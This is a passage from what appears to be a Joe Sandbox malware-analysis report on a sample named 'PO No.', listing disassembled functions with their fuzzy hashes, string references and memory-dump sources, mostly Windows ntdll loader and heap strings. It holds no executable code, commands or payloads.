                                                            • Instruction ID: 6d80e97f5d674ec438b4003864998ce6d062725e4d06a4d7ba6256e75e390a1b
                                                            • Opcode Fuzzy Hash: 9f5cf4db4dbf223d24c2fba6bf8678be4f152e77e55e51e269d3edfc4d77f1fc
                                                            • Instruction Fuzzy Hash: 9741D372A043518FCB61DE5CD840A2A7BE4FF49B50F0905A9EDC9D7369D339D800CB81
                                                            Function 00FA0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-2558761708
                                                            • Opcode ID: ec81afac5df5c5f83f6ce68e734be49efd5b7905f722811b22a48141e7d6dbe0
                                                            • Instruction ID: 15684ca6b00839fb14b11b5749c8d76dc6a348327535a29f937ba23ce6f58038
                                                            • Opcode Fuzzy Hash: ec81afac5df5c5f83f6ce68e734be49efd5b7905f722811b22a48141e7d6dbe0
                                                            • Instruction Fuzzy Hash: E2115971314905CFC728DA14E861FBAB3A4EF81F66F248159E606CB260DB38DC80F765
                                                            Function 010120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Process initialization failed with status 0x%08lx, xrefs: 010120F3
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01012104
                                                            • LdrpInitializationFailure, xrefs: 010120FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2986994758
                                                            • Opcode ID: df53cd2c6445c15af35cc40c71264cfd9be27cec90a805841a23c7a90d364541
                                                            • Instruction ID: 85804fcacd5142d81df05847c3a3fb36953dd4bcd8944cc4d1c3df03d62eb0fb
                                                            • Opcode Fuzzy Hash: df53cd2c6445c15af35cc40c71264cfd9be27cec90a805841a23c7a90d364541
                                                            • Instruction Fuzzy Hash: 35F02834640308ABE720E60CDC43F993BA8FB81B04F200056F7C47B2C5D1B5E540D642
                                                            Function 00FA03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            • Opcode ID: 61bb4bbd4c4fbcaf95e8fe3d630087966d2cbc8387709fb6562dcf4474051a11
                                                            • Instruction ID: 1d446f5c73e9c530df41febe33d33a8018520db8d1f3207bae6f5fc900283bc0
                                                            • Opcode Fuzzy Hash: 61bb4bbd4c4fbcaf95e8fe3d630087966d2cbc8387709fb6562dcf4474051a11
                                                            • Instruction Fuzzy Hash: 96715BB1A0014A9FDB01DFA8D981BAEB7F8BF08714F144065FA05E7251EA38EE41DB60
                                                            Function 00FA52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@
                                                            • API String ID: 0-149943524
                                                            • Opcode ID: fa76ea6f494fb66ede626aa1b85a677bb0e7f10dd8189109e2b4bd4d29483bd1
                                                            • Instruction ID: c98745424635aaece6170e17055f22d27ecf037e70d4f4a7ea4e1341b224c9e4
                                                            • Opcode Fuzzy Hash: fa76ea6f494fb66ede626aa1b85a677bb0e7f10dd8189109e2b4bd4d29483bd1
                                                            • Instruction Fuzzy Hash: 9832ACB59087118BCB24CF14C490B3EB7E1EF8AB64F54492EF9859B2A0E734DC44EB52
                                                            Function 00F9A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrResSearchResource Enter, xrefs: 00F9AA13
                                                            • LdrResSearchResource Exit, xrefs: 00F9AA25
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                            • API String ID: 0-4066393604
                                                            • Opcode ID: 934f2de898724d47b20f53e9a75f52da080ccefc2db5ee936f47b919a221a8b4
                                                            • Instruction ID: 6e4c98b18f145b5b202ae22da91e80ec9400bc8c38355408c8e8ce6990345c78
                                                            • Opcode Fuzzy Hash: 934f2de898724d47b20f53e9a75f52da080ccefc2db5ee936f47b919a221a8b4
                                                            • Instruction Fuzzy Hash: BFE16F72E00219DBEF21DE99C980BBEB7B9AF54324F244026F901E7291D778DD41EB91
                                                            Function 0105A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction ID: c056f47090cd751f66a81b01b70eda0172e1a0bff580f5ec49039bb5444ccad4
                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction Fuzzy Hash: DDC1BE31304346DBEBA5CE28C841B6BBBE5AFC8318F084A2DFAD58B291D775D505CB51
                                                            Function 00F90CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Failed to retrieve service checksum., xrefs: 00FEEE56
                                                            • ResIdCount less than 2., xrefs: 00FEEEC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                            • API String ID: 0-863616075
                                                            • Opcode ID: e64d696e1f1392086242e28b3cdcca65582adcad0b972d0bba1287007541a8e6
                                                            • Instruction ID: b352ee7dd71fb76830a375797fde6e88d04fd143a06192e816da356a4633be8f
                                                            • Opcode Fuzzy Hash: e64d696e1f1392086242e28b3cdcca65582adcad0b972d0bba1287007541a8e6
                                                            • Instruction Fuzzy Hash: 6CE1D2B19087849FE324CF16C440BABBBE4FBC8714F40892EE5D98A381DB759909DF56
                                                            Function 0100E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • Opcode ID: 0e7c19daf36dafa43eea538c5940f8c7a8883c9b17b1e3967de784dc8ead24b6
                                                            • Instruction ID: 8b62f58e792598ab9dfc37a1826fb57d320cfde3af97c70ea379c650364a7b3e
                                                            • Opcode Fuzzy Hash: 0e7c19daf36dafa43eea538c5940f8c7a8883c9b17b1e3967de784dc8ead24b6
                                                            • Instruction Fuzzy Hash: 87615D71E047189FEB25DFA8C841BADBBF9FB44700F14446EE689EB291D731AA00DB50
                                                            Function 010343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$MUI
                                                            • API String ID: 0-17815947
                                                            • Opcode ID: 4a2ee9e48f8d7e5368c472783c9f7442fefeb2af3c13732cb012ea8e20b43dfc
                                                            • Instruction ID: 77bb4c11913fb5f25f449e46a918c0dafd43c9e2d0c218743cd1aee288bc8845
                                                            • Opcode Fuzzy Hash: 4a2ee9e48f8d7e5368c472783c9f7442fefeb2af3c13732cb012ea8e20b43dfc
                                                            • Instruction Fuzzy Hash: F15149B1E0021DAEDB11DFA9CC81AEEBBBDEB44754F14052AF641FB281D7349905CBA0
                                                            Function 00F904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F9063D
                                                            • kLsE, xrefs: 00F90540
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                            • API String ID: 0-2547482624
                                                            • Opcode ID: 01d3b2398825fc54b8b44247c0457a068ace3bf14691c8776f00cf32ae8af22a
                                                            • Instruction ID: 9f193f78a51fb15cf2fd26c1025ca8fc8bcf9b0b58e1eabeada408f3d07d3fe8
                                                            • Opcode Fuzzy Hash: 01d3b2398825fc54b8b44247c0457a068ace3bf14691c8776f00cf32ae8af22a
                                                            • Instruction Fuzzy Hash: EC5103719047468FEB24EF65C4407A7B7E5AF84314F04483EEADA87241EB34E945DF92
                                                            Function 00F9A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 00F9A2FB
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 00F9A309
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            • Opcode ID: 23d3dc4b9f443a9cdabfcb2fa3d45909543f35ea63bbaf06a6a662ca6ae779bf
                                                            • Instruction ID: 4c7b2dc63241582fecaee3849c40079bcb788cd35b2f63c4ada9682ff074c395
                                                            • Opcode Fuzzy Hash: 23d3dc4b9f443a9cdabfcb2fa3d45909543f35ea63bbaf06a6a662ca6ae779bf
                                                            • Instruction Fuzzy Hash: 0E41AE31A04649DBEB21CF59C840F69B7B4FF85714F2440A9EE00DB2A1E37AD900EB91
                                                            Function 00FCA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            • API String ID: 2994545307-4008356553
                                                            • Opcode ID: 600d447a753f87393c1724313cb6ef47c9fefe6e48432509039f8ed70be79854
                                                            • Instruction ID: a18efab84a46fc4e0e928c2bf8571b75c8e96903accecca5f61b0359dfad7ede
                                                            • Opcode Fuzzy Hash: 600d447a753f87393c1724313cb6ef47c9fefe6e48432509039f8ed70be79854
                                                            • Instruction Fuzzy Hash: 0301D1B2254748AFD311DF14CE46F1677E8E744B19F05893DB588C7190E739E804EB4A
                                                            Function 00F9C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API String ID: 0-1339004836
                                                            • Opcode ID: 612e8bdaedea7fa6a95c3037ab1042e1b9b47afc30e5793d42689667af2326aa
                                                            • Instruction ID: 0845a92bbb89728d7f18b64a2bf0a558656ab1919f951a035edefd7f6823c1ed
                                                            • Opcode Fuzzy Hash: 612e8bdaedea7fa6a95c3037ab1042e1b9b47afc30e5793d42689667af2326aa
                                                            • Instruction Fuzzy Hash: 9E823C75E002189FEF24CFA9C980BADB7B5BF48710F24816AE859AB351D7349D41EF90
                                                            Function 00FE2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: P`vRbv
                                                            • API String ID: 0-2392986850
                                                            • Opcode ID: facc1fc14241181005e5829f5a9bc9063d2e1a93121348b2524504a6b353bd5e
                                                            • Instruction ID: 58318ce29a0a27f31562d88f8f7511d9891333eb206f01710cb7d8f8da18bfe4
                                                            • Opcode Fuzzy Hash: facc1fc14241181005e5829f5a9bc9063d2e1a93121348b2524504a6b353bd5e
                                                            • Instruction Fuzzy Hash: 9542D672D042DAAEDF24DF6AD84D7BDBBB1AF45320F28801AE541AB290D6358F41F750
                                                            Function 0103CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                            • Instruction ID: 305c5b0b83483961a4efc9181efabe64e3b6c62a868b9ed57df8932596f3508f
                                                            • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                            • Instruction Fuzzy Hash: 75621870D012188FCB98DF9AC4D4AADB7B2FF8C311F64819AE9816B745C7356A16CF60
                                                            Function 00FB2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0
                                                            • API String ID: 0-4108050209
                                                            • Opcode ID: 145861ffee0b7e262f8a35eed41f14aa088d721a92763c07e17e73bb4f9ea28f
                                                            • Instruction ID: 1ac22f07a2c87e3cb247fccfb2b0eebbc5a1735cc11d3a5100866507cdc51d1d
                                                            • Opcode Fuzzy Hash: 145861ffee0b7e262f8a35eed41f14aa088d721a92763c07e17e73bb4f9ea28f
                                                            • Instruction Fuzzy Hash: 25F1A071A48345CFCB25DF2AC480BAAB7E5AF88724F14482DF88987251DB34DE45EF52
                                                            Function 00F26D13 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (
                                                            • API String ID: 0-3887548279
                                                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                            • Instruction ID: 8ef730e59ff37d5aba700e01098c1478b920e6a65f4a74b798a142400aa6876e
                                                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                            • Instruction Fuzzy Hash: C0022DB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                            Function 00F26D0E Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                            • Associated: 00000000.00000002.2418502215.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f10000_PO No.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (
                                                            • API String ID: 0-3887548279
                                                            • Opcode ID: df5e5e2717f0ce140d89b5bc111d3416fb7feb460068de0e14075fa43804f937
                                                            • Instruction ID: e77270957f8bcf0ab0545b8d2ad404486781371d23f3d32b593e9b573c406139
                                                            • Opcode Fuzzy Hash: df5e5e2717f0ce140d89b5bc111d3416fb7feb460068de0e14075fa43804f937
                                                            • Instruction Fuzzy Hash: CC022DB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD849A7315D6746A418F80
                                                            Function 00F92FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PATH
                                                            • API String ID: 0-1036084923
                                                            • Opcode ID: a4f6bec147b2c661aaeab0b5d89dba6e885cba9a6324304fd78c69f98bf28c9e
                                                            • Instruction ID: 62b0a6c62aa11c754975403642b177e34665fc2888b5703560d54e03003026ba
                                                            • Opcode Fuzzy Hash: a4f6bec147b2c661aaeab0b5d89dba6e885cba9a6324304fd78c69f98bf28c9e
                                                            • Instruction Fuzzy Hash: 97F1BE71D04218DBEF24DF99D881ABEB7B1FF88710F554029E881AB250DB35AE41EB61
                                                            Function 0101EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: __aullrem
                                                            • String ID:
                                                            • API String ID: 3758378126-0
                                                            • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                            • Instruction ID: 799529eed832918c2e65c6a4728799cef7612375c725e90a08c95341a7a1c3e8
                                                            • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                            • Instruction Fuzzy Hash: 84419171F0011A9BDF19DFBCC8805AEF7F2FF88320B198279E655E7285D638A9548780
                                                            Function 00F90100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 4e985beee0412e143591822c81a5115b85b384a9c742d69d4764b79844bdd9ea
                                                            • Instruction ID: e3b9b3ed70a98d27b05308693c5a3d953bea4d520cded81c7a67b1a476771670
                                                            • Opcode Fuzzy Hash: 4e985beee0412e143591822c81a5115b85b384a9c742d69d4764b79844bdd9ea
                                                            • Instruction Fuzzy Hash: C9A10831E042686FFF28CB259C45BFE77A55F95324F0440A9FD8AA7281DE788D84BB50
                                                            Function 01044420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 4abd47a8a7dcefc84875f0f196e25d9e46fc5a5da86d57470d01cd3ad17bfc4d
                                                            • Instruction ID: 6405efe227938ab0cc4ab8957e5d92bb0f52c12b9d2811826966db764361979b
                                                            • Opcode Fuzzy Hash: 4abd47a8a7dcefc84875f0f196e25d9e46fc5a5da86d57470d01cd3ad17bfc4d
                                                            • Instruction Fuzzy Hash: 9EA1F8B06003646BEF75DA288CC5BED7BE4AF4A754F0844F8AEC5DB282CB749945CB50
                                                            Function 01016420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 75138650a7e46ae8f4f598aed8d2badb9d45d3f2f7abfeba396260242bdc0ab6
                                                            • Instruction ID: b25c1292c728ceac90856084615147b217ea31a1896b1a4c0b834cbe16a6320e
                                                            • Opcode Fuzzy Hash: 75138650a7e46ae8f4f598aed8d2badb9d45d3f2f7abfeba396260242bdc0ab6
                                                            • Instruction Fuzzy Hash: 3C9183B1A40219AFDB21DB95CC85FEEBBB9EF08B50F140055F600AB195DB79AD00DBA0
                                                            Function 0103E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 955a37de0b45aaed5cf274ad7ee5e580db3a383438cb5df633d9efb8b8c346ab
                                                            • Instruction ID: 72b5ccf8b6268ea239c9797b727e9dc28b30a6d10705e2674bbc9aec0cc9e1bf
                                                            • Opcode Fuzzy Hash: 955a37de0b45aaed5cf274ad7ee5e580db3a383438cb5df633d9efb8b8c346ab
                                                            • Instruction Fuzzy Hash: BA91CE71900609BFDB22ABA4DC85FEFBBBEEF85740F100129F541A7251DB39A901DB90
                                                            Function 00FCA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API String ID: 0-1106856819
                                                            • Opcode ID: 323f02650625a63158617288825d6552b868a2d8e7ec0c0552ee9604f84536d9
                                                            • Instruction ID: 04846a35506d98706317e206d8e871d329e1c5b15ebb5307c930b079b4020cbb
                                                            • Opcode Fuzzy Hash: 323f02650625a63158617288825d6552b868a2d8e7ec0c0552ee9604f84536d9
                                                            • Instruction Fuzzy Hash: 4B7192B5E0021ACFEF69CF98C5906EDBBF2BF48710F14816EE485A7281E7369911CB50
                                                            Function 01034978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .mui
                                                            • API String ID: 0-1199573805
                                                            • Opcode ID: b8c663825b18566e919c4fd6186619bc7836356b8b982a57c0a673a52686316b
                                                            • Instruction ID: bc9b914d0862e1e7a44b7f03ab70f60a7b9233e0000ca47460d1a37ef8a13d7f
                                                            • Opcode Fuzzy Hash: b8c663825b18566e919c4fd6186619bc7836356b8b982a57c0a673a52686316b
                                                            • Instruction Fuzzy Hash: 4751D572D006299BDF14DF99C840AEEBBB8AF44B14F05416AFA51FF240D3389D02CBA4
                                                            Function 00FAE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API String ID: 0-1948896318
                                                            • Opcode ID: 9e2710d4813701377689950c874223665ff188782f0d0cf59416bab18ea0a209
                                                            • Instruction ID: 3fee12a91cb3c7fcaafb1a41a32fa3a0f2cac465b1368d4bcba2e204a7ea2806
                                                            • Opcode Fuzzy Hash: 9e2710d4813701377689950c874223665ff188782f0d0cf59416bab18ea0a209
                                                            • Instruction Fuzzy Hash: DB4191B2908311ABD710DA75CD41B6BB7E8AF89B14F44092DF994E7280E778DD04E793
                                                            Function 0100C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • Opcode ID: 71eb051280a7beee45fdf823209c7ac9d33edcfb54fd02f15a5acff1416e690e
                                                            • Instruction ID: fb083472e2faecd7792654ab149be1877770ef9f3a97cb1fedd4e81b930dd802
                                                            • Opcode Fuzzy Hash: 71eb051280a7beee45fdf823209c7ac9d33edcfb54fd02f15a5acff1416e690e
                                                            • Instruction Fuzzy Hash: 8641A6B1D0012CABEB21DA50CD85FDEB77DAB44714F0046E5AA48AB181DB709F888F98
                                                            Function 01026B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: e7207e6cd2034f2f9330be11aa4026c9a91f9936db94605a0c573bb7e268dfd6
